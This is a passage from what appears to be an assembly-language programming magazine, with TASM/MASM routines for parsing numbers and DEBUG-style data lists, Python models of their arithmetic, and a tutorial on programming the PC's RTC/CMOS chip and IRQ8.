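                sbb     ecx, 0
                ret
__cs_small:     test    eax, eax
                jz      __cs_done       ; invalid: nothing to negate
                neg     edx             ; dword in edx
                ret
__cs_float:     fchs                    ; float in st(0)
__cs_done:      ret
endp ConvertSigned
```

The wrapper relies on ConvertNumber preserving esi, as the article states
it does for all registers except eax, ecx and edx.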
Floating point conversion is done using multiplication, not by means
of the fbld instruction. This is because fbld limits numbers to 18
decimal digits, but the function can accept longer numbers as long as
they are not too large/small.
And here is the function. It was written (and tested) in TASM's ideal
mode, but it can be easily ported to MASM or NASM. The function preserves
all registers but eax, ecx and edx, which are used for the return value.
; This helper macro checks if there was an error on the fpu
macro chkfpu _endinglabel
fxam
fstsw ax
sahf
jc _endinglabel
endm
proc ConvertNumber uses edi
;---------------- Identify number format
; Search for 0 at the end
mov edi, esi
or ecx, -1
xor eax, eax
cld
repne scasb
; Move to the last character
dec edi
dec edi
; Is there anything ?
cmp esi, edi
ja __invalid
; Identify C-style and Pascal-style hexadecimals
cmp [byte esi+1], 'X'
je __c_hex
cmp [byte esi], '$'
je __pas_hex
; Identify other types using the last character
movzx eax, [byte edi]
cmp eax, 'H'
je __asm_hex
cmp eax, 'B'
je __binary
cmp eax, 'D'
je __decimal
cmp eax, 'Q'
je __octal
cmp eax, 'O'
je __octal
cmp eax, 'F'
je __float_clr
; Find a decimal point (distinguish between integer and float)
not ecx
dec ecx
mov eax, '.'
mov edi, esi
repne scasb
je __float
;---------------- Process decimal integer
; Prepare
__decimal: mov [byte edi], 0
mov edi, esi
xor eax, eax
; Get a digit
__next_decimal: movzx ecx, [byte edi]
inc edi
xor edx, edx
; Zero ends the string
test ecx, ecx
jz __finito
; Multiply the already loaded part by ten
add edx, 10
mul edx
; If an overflow occurs - the number is a quadword
jo __decimal_qword
; Check digit validity
sub ecx, '0'
jc __invalid
cmp ecx, 9
ja __invalid
; Add the digit
add eax, ecx
; Next digit or process a quadword if carry occurs
jnc __next_decimal
jmp __decimal_carry
;---------------- Decimal (appears to be greater than 0FFFF_FFFFh)
; Check digit validity
__decimal_qword: sub ecx, '0'
jc __invalid
cmp ecx, 9
ja __invalid
; Add the digit (qword addition)
add eax, ecx
__decimal_carry: adc edx, 0
; Load next digit
movzx ecx, [byte edi]
inc edi
; Check for ending zero
test ecx, ecx
jz __finito
; Multiply high part by 10
push eax
mov eax, edx
mov edx, 10
mul edx
; Number too large if an overflow occurs
jo __decimal_overflow
; Multiply low part by 10
xchg eax, [esp]
mov edx, 10
mul edx
; Join high parts
add edx, [esp]
; Number too large if carry
jc __decimal_overflow
; Next digit
add esp, 4
jmp __decimal_qword
; Handle overflow
__decimal_overflow: pop eax
jmp __invalid
;---------------- Process hexadecimal integer
; Was Pascal-style hex (leading '$')
__pas_hex: lea edi, [esi+1]
jmp __hex
; Was C-style hex (leading '0X')
__c_hex: cmp [byte esi], '0'
jne __invalid
lea edi, [esi+2]
jmp __hex
; Was asm-style hex (ending with 'H')
__asm_hex: mov [byte edi], 0
mov edi, esi
; Clear what will become the number
__hex: xor eax, eax
xor edx, edx
; Get a digit
__get_hex: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __finito
; Number too large if the most significant nibble of edx
; is nonzero
cmp edx, 0FFFFFFFh
ja __invalid
; Multiply the already converted part by 16
shld edx, eax, 4
add eax, eax ; to avoid shift (see lea below)
; Convert ASCII to digit
sub ecx, '0'
jc __invalid
cmp ecx, 9
jna __hex_ok
sub ecx, 7
cmp ecx, 9
jna __invalid
cmp ecx, 15
ja __invalid
; Add the digit
__hex_ok: lea eax, [eax*8+ecx]
jmp __get_hex
;---------------- Return integer
__finito: mov ecx, edx
mov edx, eax
cmp ecx, 1
sbb eax, eax
add eax, 2
ret
;---------------- Process binary integer
; Prepare
__binary: mov [byte edi], 0
xor eax, eax
xor edx, edx
mov edi, esi
; Get a digit
__get_binary: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __finito
; Shift everything left and add the digit
shr ecx, 1
adc eax, eax
adc edx, edx
jc __invalid
; Check digit validity and get next digit if OK
cmp ecx, '0' shr 1
jne __invalid
jmp __get_binary
;---------------- Process octal integer
; Prepare
__octal: mov [byte edi], 0
xor eax, eax
xor edx, edx
mov edi, esi
; Get a digit
__get_octal: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __finito
; Check if there is a room for another digit
cmp edx, 1FFFFFFFh
ja __invalid
; Multiply the already converted part by 8
shld edx, eax, 3
; Convert ASCII to number
sub ecx, '0'
jc __invalid
cmp ecx, 7
ja __invalid
; Add the digit
lea eax, [eax*8+ecx]
jmp __get_octal
;---------------- Invalid number
__invalid: fninit
xor eax, eax
ret
;---------------- Process integer part of a float
; Prepare (st0=0, st1=10)
__float_clr: mov [byte edi], 0
__float: finit
push 037Fh ; mask all FPU exceptions, 64-bit precision
fldcw [word esp]
push 10
fild [dword esp]
add esp, 8
fldz
mov edi, esi
; Get a digit
__get_integer: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __float_ready
; Decimal point starts the fraction part
cmp ecx, '.'
je __float_fraction
; Multiply the already converted part by 10
fmul st, st(1)
chkfpu __invalid
; Convert ASCII to number
sub ecx, '0'
jc __invalid
cmp ecx, 9
ja __invalid
; Add the digit
push ecx
fiadd [dword esp]
add esp, 4
chkfpu __invalid
jmp __get_integer
;---------------- Process fractional part of a float
; Prepare (st0=0, st1=1, st2=num, st3=10)
__float_fraction: fld1
fldz
; Get a digit
__get_fraction: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __fraction_ready
; E starts exponent
cmp ecx, 'E'
je __fraction_ready
; Multiply the already converted part by 10
fmul st, st(3)
; Multiply the divisor by 10
fxch st(1)
fmul st, st(3)
fxch st(1)
chkfpu __invalid
fxch st(1)
chkfpu __invalid
fxch st(1)
; Convert ASCII to number
sub ecx, '0'
jc __invalid
cmp ecx, 9
ja __invalid
; Add the digit
push ecx
fiadd [dword esp]
add esp, 4
chkfpu __invalid
jmp __get_fraction
;---------------- Process exponent part of a float
; Divide the fraction by the divisor
__fraction_ready: fdivrp st(1), st
; Add fraction to integer
faddp st(1), st
; E indicates start of exponent
cmp ecx, 'E'
jne __float_ready
; Prepare (st0=0, st1=num, st2=10)
fldz
; Sign of the exponent
xor edx, edx
cmp [byte edi], '-'
jne __no_minus
not edx
inc edi
__no_minus: cmp [byte edi], '+'
jne __get_exponent
inc edi
; Get a digit
__get_exponent: movzx ecx, [byte edi]
inc edi
; Zero ends the string
test ecx, ecx
jz __exponent_ready
; Multiply the already converted part by 10
fmul st, st(2)
chkfpu __invalid
; Convert ASCII to number
sub ecx, '0'
jc __invalid
cmp ecx, 9
ja __invalid
; Add the digit
push ecx
fiadd [dword esp]
add esp, 4
chkfpu __invalid
jmp __get_exponent
; Multiply by 10**exp (** is a power operation)
__exponent_ready: test edx, edx
jz __positive_exp
fchs
__positive_exp: fldl2t ;──────────────────┐ 10**x = 2**(x*log2(10))
fmulp st(1), st ;│
fld st ;│
frndint ;│
fsub st(1), st ;│
fld1 ;│
fscale ;│
fstp st(1) ;│
fxch st(1) ;│
f2xm1 ;│
fld1 ;│
faddp st(1), st ;│
fmulp st(1), st ;───────┘
fmulp st(1), st
; Return float
__float_ready: chkfpu __invalid
fstp st(1)
mov eax, 3
ret
endp
And that is it. The function is not meant to work as fast as possible and
was not optimized, but it does the task it has to do.
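The 10**x step at the end of the float path is the least obvious part, so here is a small Python model of it. It is only a sketch of the arithmetic, not of the FPU stack handling; the function name pow10_split is made up for this illustration, and Python's round() stands in for FRNDINT on the assumption that the FPU is in its default round-to-nearest mode.

```python
import math

def pow10_split(x: float) -> float:
    """Compute 10**x as 2**n * 2**f, the way the FSCALE / F2XM1 pair does."""
    y = x * math.log2(10.0)          # fldl2t / fmulp : y = x * log2(10)
    n = round(y)                     # frndint        : nearest integer to y
    f = y - n                        # fsub           : remainder, |f| <= 0.5
    scaled = math.ldexp(1.0, n)      # fld1 / fscale  : 1.0 * 2**n
    frac = (2.0 ** f - 1.0) + 1.0    # f2xm1, then fld1 / faddp : 2**f
    return scaled * frac             # fmulp          : 2**n * 2**f = 10**x

if __name__ == "__main__":
    print(pow10_split(3.0))
```

The split is needed because F2XM1 only accepts a small argument, so the integer part of the exponent has to be handled separately by FSCALE.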
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
List Scan Library Routine
by Laura Fairhead
Firstly let me introduce an auxiliary routine that this one uses. It is
called 'scaws' and scans past white space. It is very simple, and the
definition of whitespace here is SPACE (020h) or TAB (09h):-
========START OF CODE======================================================
;
;scaws- scan whitespace
;
;entry: DS:SI=string
; DF=0
;
;exit: SI=updated to first non-whitespace character
; AL=value of the character
;
scaws PROC NEAR
;
;there is nothing to explain here but you might take note now
;that I always use the same label names in different PROC blocks,
;in MASM you can do this with OPTION SCOPED
;
lop: LODSB
CMP AL,020h
JZ lop
CMP AL,09h
JZ lop
DEC SI
RET
scaws ENDP
========END OF CODE========================================================
'scalst' is basically a routine to scan-convert a list which can
consist of values and strings. The radix of the values must be set
beforehand by calling 'scanur', as the routine uses 'scanu' to convert
values and doesn't set the radix itself. The syntax of the list is
almost the same as the list in DEBUG, which is in fact where I got the
idea from. You have zero or more data items, optionally separated by
commas. Whitespace can be used freely as a delimiter, and no delimiters
are necessary where there is no need for them (eg: between a value and a
string).
The routine takes several parameters, the address of your string
(DS:SI), the address of somewhere to store the converted data (ES:DI),
the size of the data store (CX) and the size of a unit (AL). The unit size
can be byte (AL=1), word (AL=2), dword (AL=4).
Each data item, as in value/string character, is zero-padded to the
unit size for storing. Also values are checked that they are in range for
the unit size. This method therefore allows us to have those silly
word strings.
Here are some examples, all of these assume that we had set the
radix = 010h (by calling 'scanur' with AL=010h) :-
Calling with AL=1, and our string=1 2 3 "ABC" yields:-
01 02 03 41 42 43
Calling with AL=4, and our string="0"1FE08 2 yields:-
30 00 00 00 08 FE 01 00 02 00 00 00
Calling with AL=2, and our string=9A06 87"DEF" yields:-
06 9A 87 00 44 00 45 00 46 00
Calling with AL=2, and our string="ABC"FE0FE 0 1 2 yields:-
ERROR! CF=1 (FE0FE>FFFF)
A particularly powerful feature of this routine is that it takes
a parameter giving the size of your data store (in bytes). This means
that it will be impossible for the program to be crashed because there
was too much data. Programmers are generally too lazy to do this sort of
range checking, much to their woe, as one particularly wily hacker
attack called 'smashing the stack' has taught.
Example; if we called with AL=2, CX=4 and string=1 9 F
ERROR! CF=1 (01 00 09 00 0F 00 > 4bytes)
As an aside, the function is not entirely the same as DEBUG's list
scanner. With DEBUG the strings are always converted to byte lists, no
matter what the unit size is. It is trivial to modify the routine to
work in this way.
One last note is that the end of the list is the first invalid
character in the string. This is not an error, of course, since it is
the responsibility of the controlling parser to decide this based on the
context; eg: DEBUG might check for a semicolon comment on the end of
the line, though as a matter of fact it doesn't. A premature ending (ie:
0 byte appearing inside the quotes of a string token) will abort with
error, thus;
AL=1, string=0A 98"unterminated string yields:-
ERROR! CF=1 (unterminated string)
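To make the rules above concrete, here is a rough Python model of what the routine does with a list. It is a sketch only: the name scalst_model is invented, a ValueError stands in for the CF=1 exit, and the digit scanning is my assumption of how 'scanu' behaves (longest run of digits valid in the radix, either letter case).

```python
def scalst_model(text, unit, store_size, radix=16):
    """Return (converted bytes, index of the first unscanned character)."""
    digits = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"[:radix]
    limit = (1 << (8 * unit)) - 1        # size mask: FFh, FFFFh or FFFFFFFFh
    out = bytearray()

    def store(value):
        # every datum is zero-padded to the unit size, little-endian
        if len(out) + unit > store_size:
            raise ValueError("data store overflow")
        out.extend(value.to_bytes(unit, "little"))

    def skip_ws(i):
        while i < len(text) and text[i] in " \t":
            i += 1
        return i

    i = skip_ws(0)
    while True:
        start = i
        while i < len(text) and text[i].upper() in digits:
            i += 1
        if i > start:                            # a value token
            value = int(text[start:i], radix)
            if value > limit:
                raise ValueError("value out of range for unit size")
            store(value)
        elif i < len(text) and text[i] == '"':   # a string token
            i += 1
            while True:
                if i >= len(text):
                    raise ValueError("unterminated string")
                ch = text[i]
                i += 1
                if ch == '"':
                    break
                store(ord(ch))
        else:
            return bytes(out), i                 # first invalid character
        i = skip_ws(i)
        if i < len(text) and text[i] == ",":     # the optional comma
            i = skip_ws(i + 1)

if __name__ == "__main__":
    data, end = scalst_model('9A06 87"DEF"', unit=2, store_size=64)
    print(data.hex(" "), end)
```

Running the examples from the text through this model gives the same byte sequences, and the three error cases raise instead of returning.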
========START OF CODE======================================================
;
;scalst- data list scan/convert routine
;
;entry: DS:SI=string
; ES:DI=store
; CX=#bytes size of store
; AL=unit size (1=byte,2=word,4=dword)
; DF=0
;
; "scanur" must have been called at least once previously
; in order to set the radix of scanned values
;
; !! entry parameters are not validated and invalid entry
; !! parameters will cause undefined behaviour
;
;exit: CF=1=>error (parse/overflow)
; CF=0=>okay, then:
; ZF=1=>no data scanned, ie: CX=0
; ZF=0=>data scanned
; SI=updated to the first invalid character
; DI=updated to the end of converted data + 1
; CX=#bytes converted data (invalid on overflow error)
;
;note: requires routines "scaws" and "scanu"
;
scalst PROC NEAR
;
;initialise stack frame
;[BP-4] (dw) size mask
; =000000FFh for unit size 1
; =0000FFFFh for unit size 2
; =FFFFFFFFh for unit size 4
;[BP-6] (w) unit size
;[BP-8] (w) original data offset DI
;
;EAX is preserved and the main loop is entered
;
ENTER 8,0
PUSH EAX
CBW
MOV [BP-6],AX
NEG AL
AND AL,3
SHL AL,3
PUSH CX
XCHG CX,AX
OR EAX,-1
SHR EAX,CL
POP CX
MOV [BP-4],EAX
MOV [BP-8],DI
JMP SHORT inlop
;
;main loop head
; ignore any whitespace and skip the optional comma
;
lop: CALL NEAR PTR scaws
CMP BYTE PTR [SI],','
JNZ SHORT ko
INC SI
;
;main loop entry
; ignore any whitespace and if a value token is recognised
; write it to data store and continue loop
;
inlop: CALL NEAR PTR scaws
ko: CALL NEAR PTR scanu
JC SHORT don
JZ SHORT ko2
;
; check that the value is in range for the unit size, if not
; abort here with an error
;
CMP [BP-4],EAX
JC SHORT don
CALL NEAR PTR wracc
JMP lop
;
; no value was present so check for a string
;
ko2: CMP BYTE PTR [SI],022h
CLC
JNZ SHORT don
;
; get string into data store
;
INC SI
XOR EAX,EAX
lop1: MOV AL,[SI]
;
; unterminated string causes an error abort, LODSB is not used for the
;load in order to ensure that [SI] will point to the invalid character
;
CMP AL,1
JC SHORT don
INC SI
CMP AL,022h
JZ lop
CALL NEAR PTR wracc
JMP lop1
;
; exit point for 'wracc' routine below, clean-up the stack
;
err0: POP EAX
;
; main exit point. the carry flag is preserved as this is used
; for both error and normal exits. the number of bytes stored
; is calculated into CX, the INC/DEC ensuring ZF=1 if this was zero
;
don: LAHF
MOV CX,DI
SUB CX,[BP-8]
SAHF
INC CX
DEC CX
;
; restore the only corrupted register and 'LEAVE'
;
POP EAX
LEAVE
RET
;
;wracc- write datum in accumulator to data store
; AL/AX/EAX is written to the data store depending on the unit size.
; throughout the routine DI is the offset into the data store and
; CX is the #bytes left in it. these are updated but if there are
; insufficient bytes remaining in the store we abort with error, taking
; care to clear the 4 bytes (AX + return address) off the stack first
;
wracc: PUSH AX
MOV AX,[BP-6]
SUB CX,AX
JC err0
CMP AL,2
POP AX
JZ SHORT ko0
JNS SHORT ko1
STOSB
RET
;
; note that 066h STOSW = STOSD
;
ko1: DB 066h
ko0: STOSW
RET
scalst ENDP
========END OF CODE========================================================
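The size mask set-up at the top of 'scalst' (NEG / AND / SHL, then a shift of an all-ones dword) is compact enough to deserve a second look. The following Python lines are a sketch of that arithmetic only; size_mask is a name made up for this note.

```python
def size_mask(unit: int) -> int:
    """Largest value that fits in a unit of 1, 2 or 4 bytes."""
    shift = ((-unit) & 3) << 3       # NEG AL / AND AL,3 / SHL AL,3 -> 24, 16 or 0
    return 0xFFFFFFFF >> shift       # OR EAX,-1 / SHR EAX,CL

if __name__ == "__main__":
    for unit in (1, 2, 4):
        print(unit, hex(size_mask(unit)))
```

The trick is that -unit AND 3 gives the number of unused bytes in the dword, so multiplying by 8 gives the number of bits to shift out.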
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Using the RTC
by Jan Verhoeven
Here are some routines to use the RTC/CMOS chip for serious timing. It's
an introductory tutorial, so you'll be given more than enough opportunity to
experiment with timing via this method.
About the hardware.
===================
The RTC chip used to be a Motorola MC 146818A chip, but nowadays you
will either find a Dallas 1287 or 1387 style chip, or it is embedded in
the chipset. So far for romance... :o)
I will describe the Dallas DS 1287 since this is the configuration which
has been most common for many years now, and the majority of the
features are the same as for the other chips.
The DS 1287 is a clock/RAM with a Lithium battery inside the package.
That's why it stays so big: the battery needs space. If the system is
powered on, the RTC gets its power from the power supply. When the PC is
off, the RTC goes into power-down mode and slowly drains the Lithium
cell. Expected life for the battery is around 10 years.
The DS 1287 has 64 storage locations, 14 of which are clock and control
registers and the remaining 50 are battery-backed general purpose RAM
cells. This is where the CMOS setup of your PC stores its system setup
data.
The programmable clock can issue an interrupt, which can be triggered by
three independent events: time of day, periodic signal or end of clock-
update.
The 14 registers inside the DS 1287 are:
address purpose
------- ---------------------------------------
0 current value of seconds
1 alarm setting for seconds
2 current value of minutes
3 alarm setting for minutes
4 current value of hours
5 alarm setting for hours
6 Day of the week [Sunday = 1]
7 Day of the month
8 month [1..12]
9 year of this century [0..99]
10 Control register A
11 Control register B
12 Control register C [read-only]
13 Control register D [read-only]
If you want to know the time of day, or any other date related data,
just select the RTC chip and request the contents of the desired
register.
The alarm registers can be set to generate long-time periodical
interrupts, or for having the chip give a signal when it's time for your
nap. The alarm rate ranges from once per second to once per day.
And since these alarm registers are almost never used, they can also be
used for storing some data for your own software. PTS Partition Manager
for example uses these registers to keep track of where it was, while
reformatting the hard disk. If there is a power-fail, it will just
continue where it left off.
In the PC, the RTC chip is hidden from the programmer. It can only be
accessed in an indirect way. The trick is to first select a register
location and then access that one register as follows:
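mov al, <register number>
out 70h, al ; select <register number>
in al, 71h ; for a READ operation
; ... or, for a WRITE operation with the new value in AH:
mov al, ah ; OUT only takes AL as its 8-bit source
out 71h, al ; for a WRITE operation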
So, we use port 70h for selecting a register or storage location and use
port 71h for doing the actual access to that register. A bit tedious,
but that's how the PC was designed in the first place.
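If the two-step access is new to you, the following toy model in Python may help. It touches no hardware at all; the class CmosModel and the helpers read_reg and write_reg are invented for this sketch, and the only thing it demonstrates is the "select first, then access" protocol on ports 70h and 71h.

```python
class CmosModel:
    """Toy model of the index/data port pair (no real port I/O)."""
    INDEX_PORT = 0x70
    DATA_PORT = 0x71

    def __init__(self):
        self.cells = [0] * 64          # 14 clock/control registers + 50 RAM bytes
        self.selected = 0

    def out(self, port, value):
        if port == self.INDEX_PORT:
            self.selected = value & 0x3F       # latch the register number
        elif port == self.DATA_PORT:
            self.cells[self.selected] = value & 0xFF

    def inp(self, port):
        if port == self.DATA_PORT:
            return self.cells[self.selected]
        return 0xFF    # assumption: the index port is treated as write-only

def read_reg(chip, number):
    chip.out(CmosModel.INDEX_PORT, number)     # out 70h, al
    return chip.inp(CmosModel.DATA_PORT)       # in  al, 71h

def write_reg(chip, number, value):
    chip.out(CmosModel.INDEX_PORT, number)     # out 70h, al
    chip.out(CmosModel.DATA_PORT, value)       # out 71h, al

if __name__ == "__main__":
    chip = CmosModel()
    write_reg(chip, 0x0E, 0x5A)
    print(hex(read_reg(chip, 0x0E)))
```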
In "old style" RTC chips the century is maintained in software. It
resides in a RAM cell, offset 32h/50d, so it will not be affected by a
year-rollover from 99 to 00. If you update it with a short piece of code
on January first 2000, your PC will be ready for many, many, moons to
come.
The control registers.
======================
Registers A, B, C and D are the registers that control the working of
the RTC clock. They have various functions and register D uses just a
single bit, which is also read-only....
But this chip is well engineered and all registers have a significant
(although not always logical) influence on the operation of it.
Register A: Timing control.
---------------------------
Register A is laid out as follows:
bit function
--- ------------------------------------------------------------
7 UIP bit: Update In Progress. When there's a ONE in this flag
the timing registers are being updated and it is not safe to
read them. Better to wait until this flag is cleared.
This one bit is read-only!
4-6 DV0-DV2: these three bits control the on-chip oscillator. Do
not experiment too much with this setting. There is only ONE
valid combination for these three bits: 010.
0-3 RS0 - RS3: These are the four Rate Selector bits. They
determine how often the IRQ pin is activated. The following
table shows the meaning of the different values.
RS3 RS2 RS1 RS0 Frequency [Hz] Period [ms]
--- --- --- --- -------------- -----------
0 0 0 0 --- ----
0 0 0 1 256 3.906
0 0 1 0 128 7.813
0 0 1 1 8192 0.122
0 1 0 0 4096 0.244
0 1 0 1 2048 0.488
0 1 1 0 1024 0.977
0 1 1 1 512 1.953
1 0 0 0 256 3.906
1 0 0 1 128 7.813
1 0 1 0 64 15.625
1 0 1 1 32 31.25
1 1 0 0 16 62.5
1 1 0 1 8 125.0
1 1 1 0 4 250.0
1 1 1 1 2 500.0
The default value in the average IBM PC is 0110 or 1024 Hz.
Since no IRQ is enabled, you will not notice any difference
if you change the value.
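The table follows a simple rule which is easier to remember than the sixteen entries. The Python function below is a sketch of that rule, assuming the usual 32.768 kHz time base (the 010 setting of DV0-DV2); the name periodic_rate_hz is made up for this note.

```python
def periodic_rate_hz(rs: int):
    """Periodic interrupt frequency for a rate selector value RS3..RS0."""
    if not 0 <= rs <= 15:
        raise ValueError("rate selector is a 4-bit value")
    if rs == 0:
        return None                 # periodic interrupt source switched off
    if rs <= 2:
        return 256 >> (rs - 1)      # the two odd ones out: 256 Hz and 128 Hz
    return 32768 >> (rs - 1)        # everything else halves from 8192 Hz down

if __name__ == "__main__":
    for rs in range(16):
        hz = periodic_rate_hz(rs)
        print(f"{rs:04b}", hz, None if hz is None else round(1000 / hz, 3))
```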
Register B: Internal operation control.
---------------------------------------
This is the most important register for controlling operation of the RTC
chip. Register A determines timing and oscillator parameters, but the B-
register determines how the system will notice these conditions.
In a normal PC, only bit 1 (24/12) is set. All other bits are cleared.
bit function
--- ------------------------------------------------------------
7 SET : If you write a ONE in this bit position, the clock
registers will not be updated anymore. Only when this bit is
ZERO will the clock registers be updated.
6 PIE : The Periodic Interrupt Enable bit controls the IRQ
pin. If this bit is ZERO, no IRQ will be given when the
programmable frequency source (selected by RS0 - RS3) times
out.
You need to set this bit to a ONE to enable a periodic IRQ
operation.
5 AIE : Alarm Interrupt Enable. When this bit is ONE, the IRQ
pin is activated when the alarm-time equals the actual time.
4 UIE : "Update Ended" Interrupt Enable. When this bit is set
to ONE, the IRQ line is asserted when the timing registers
have changed contents.
3 SQWE : Put a ONE in this bit to have the programmable
interval timer (which is controlled by RS0 - RS3) output a
square wave on pin 23 of the chip.
Unfortunately this pin 23 is not connected in a PC so for us
this bit has no meaning. But if you are man enough to bring
pin 23 of the DS 1287 to the outside world, you can use it
at will.
2 DM : Data Mode. The timing registers can display their data
in two different modes: binary and BCD. In the PC, this bit
is always ZERO, meaning that BCD is the desired format.
1 24/12 : Controls if hours are shown in 12 or 24 hours mode.
Put a ONE in here and you have 24 hours in a day. Clear this
bit and you end up with two half days of 12 hours each. In
the 12-hour mode, bit 7 of the hours register acts as an AM
or PM flag.
0 DSE : Daylight Saving Enabled. Always leave this bit cleared
to ZERO. Daylight saving time periods vary worldwide and the
dates of change are determined by politicians and not by
chipmakers. Unfortunately.
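The DM and 24/12 bits decide how the raw hours byte has to be read. As a hedged illustration, this Python sketch decodes an hours value into a plain 0..23 number; decode_hours is a hypothetical helper, and it assumes that in 12-hour mode bit 7 of the hours byte is the PM flag and that 12 AM means midnight.

```python
def decode_hours(raw: int, reg_b: int) -> int:
    """Turn the raw hours register into 0..23, honouring register B."""
    binary_mode = bool(reg_b & 0x04)      # DM bit    : 1 = binary, 0 = BCD
    mode_24h = bool(reg_b & 0x02)         # 24/12 bit : 1 = 24-hour mode
    pm = False
    if not mode_24h:
        pm = bool(raw & 0x80)             # PM flag lives in bit 7
        raw &= 0x7F
    hours = raw if binary_mode else (raw >> 4) * 10 + (raw & 0x0F)
    if not mode_24h:
        hours = hours % 12 + (12 if pm else 0)   # 12 AM -> 0, 12 PM -> 12
    return hours

if __name__ == "__main__":
    print(decode_hours(0x23, 0x02))       # BCD, 24-hour mode
```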
Register C: Interrupt sources.
------------------------------
Register C is a status-word only. The bits in this register are
read-only and only have meaning AFTER an IRQ was received.
Since there is just one IRQ pin on the RTC chip and the IRQ can have
three different sources, the handler has no way to know which one
triggered it unless only one source was enabled or it inspects the
flags in this register. The bits mean the following:
bit function
--- ------------------------------------------------------------
7 IRQF : If this bit is ONE, one of the actual interrupt
conditions was enabled and the interrupt condition was met.
6 PF : Periodic interrupt Flag. If this bit is set, the source
of this IRQ was the programmable interval timer.
5 AF : Alarm interrupt Flag. If this bit is set, the alarm
setting matched the actual time.
4 UF : The "Update Ended" interrupt Flag. If this bit is set,
the IRQ was issued by an update of the timing registers.
Bits 0 - 3 are meaningless and will always be ZERO.
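A handler that enables more than one source can sort things out by combining register C with the enable bits of register B, since PF/AF/UF sit in the same bit positions as PIE/AIE/UIE. The Python function below is a sketch of that test; irq_sources and the source names are invented for this illustration.

```python
def irq_sources(reg_c: int, reg_b: int):
    """List the enabled interrupt sources flagged in register C."""
    if not reg_c & 0x80:                  # IRQF clear: the RTC did not interrupt
        return []
    pending = reg_c & reg_b & 0x70        # flag set AND matching enable set
    names = [(0x40, "periodic"), (0x20, "alarm"), (0x10, "update-ended")]
    return [name for bit, name in names if pending & bit]

if __name__ == "__main__":
    print(irq_sources(0xC0, 0x42))        # PF set, only PIE enabled
```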
Register D: Battery status.
---------------------------
On the chip, there is a voltage reference that is constantly being
compared to the battery voltage. As long as the battery voltage stays
above the reference voltage, bit 7 (VRT, Valid RAM and Time) reads as
ONE.
If bit 7 is ever ZERO, the battery has been empty for some period of
time and hence the data in the timing registers and in the RAM locations
MAY have lost their meaning.
Bits 0 - 6 have no meaning in this register and will always return a
ZERO value.
Using the RTC internals.
========================
This, in a nutshell, is what the RTC chip is from the inside. I already
explained some lines above how to access the storage locations and the
timing registers of the DS 1287. This does not mean that everything will
also work the first time.
If you need to change a timing value, you must always first disable
register updates, even if you make sure that the changes you make to the
timing registers will fit well within an RTC timeslot. This means:
- access register B and set the SET flag
- change the timing registers
- access register B and clear the SET flag
Remember, there's not much intelligence inside a DS 1287. More recent
chips might do more tricks for the programmer, but the old beasties just
do as they were told.
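The three steps can be sketched as follows. This is Python working on a plain dictionary that stands in for the RTC registers, so it shows the order of operations only; set_time and to_bcd are hypothetical names and the sketch assumes BCD data mode.

```python
REG_SECONDS, REG_MINUTES, REG_HOURS, REG_B = 0x00, 0x02, 0x04, 0x0B
SET_BIT = 0x80

def to_bcd(n: int) -> int:
    """Pack a value 0..99 into two BCD digits."""
    return ((n // 10) << 4) | (n % 10)

def set_time(regs, hours, minutes, seconds):
    regs[REG_B] |= SET_BIT               # 1. freeze the updates
    regs[REG_HOURS] = to_bcd(hours)      # 2. change the timing registers
    regs[REG_MINUTES] = to_bcd(minutes)
    regs[REG_SECONDS] = to_bcd(seconds)
    regs[REG_B] &= 0xFF ^ SET_BIT        # 3. let the clock run again

if __name__ == "__main__":
    regs = {REG_SECONDS: 0, REG_MINUTES: 0, REG_HOURS: 0, REG_B: 0x02}
    set_time(regs, 23, 59, 7)
    print({hex(k): hex(v) for k, v in regs.items()})
```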
In order to set the periodic interrupt rate, we use the following code:
--- Begin ------------------------------------------- SetPIRate -----
SetPIRate: ; Set Periodic Interrupt Rate
mov al, 0A ; ah = rate to set
out 070, al
mov al, ah
out 071, al ; and set it in register A
ret
---- End -------------------------------------------- SetPIRate -----
This code is very straightforward. It relies on the fact that (in the
IBM PC) the contents of register A are always the same:
bit 7 = read-only
bits 4 - 6 = 010
bits 0 - 3 = rate selector
So, it can set the value of bits 4 - 7 in the calling code. It is not
good programming, since we should:
- read in the contents of Register A
- clear bits 0 - 3
- OR in the new value
- write it back to register A
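The four steps of the "proper" method boil down to one line of bit arithmetic. As a sketch in Python (with_rate is a made-up name, and the reading and writing of register A itself is left out):

```python
def with_rate(reg_a: int, rate: int) -> int:
    """Return the register A value with only the rate selector replaced."""
    if not 0 <= rate <= 15:
        raise ValueError("rate selector is a 4-bit value")
    return (reg_a & 0xF0) | rate      # clear bits 0 - 3, OR in the new value

if __name__ == "__main__":
    print(hex(with_rate(0x26, 0x0A)))   # PC default 0010 0110 -> 64 Hz setting
```

Done this way the oscillator bits 4 - 6 survive whatever the caller passes in.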
Inside the IBM PC.
==================
The IRQ pin of the RTC is connected to the Intel 8259 PIC (Programmable
Interrupt Controller, although "programmable" is too much honour for
this dumbo). In non-XT machines there are two of them, cascaded. This
means that the second one is connected to what used to be IRQ2. This
gives us a rather stupid PC IRQ priority list:
IRQ   Priority     IRQ   Priority
---   --------     ---   --------
 0        0         8        2
 1        1         9        3
 2     cascade     10        4
 3       10        11        5
 4       11        12        6
 5       12        13        7
 6       13        14        8
 7       14        15        9
A lower number means a higher priority. IRQ2 itself is taken by the
cascade, so IRQ8 - IRQ15 are serviced in its place....
The RTC interrupt line is connected to PC-IRQ8. So it comes in third
place for being serviced. When enabled!
Normally IRQ8 is NOT enabled, so you will first have to settle that with
the PIC, which is far from easy to understand. I use the following code
to enable and disable the IRQ8 processing. Disabling this interrupt is
necessary before your program is unloaded from memory. If you don't do
this, the IRQ service routine vector might point to some random code or
data in the next program loaded (like Command.Com).
--- Begin ------------------------------------------- EnableIRQ8 ----
EnableIRQ8: ; enable IRQ 8 in 8259
push ax
in al, 0A1 ; get IRQ mask word
and al, not bit 0
out 0A1, al ; enable IRQ 8
pop ax
ret
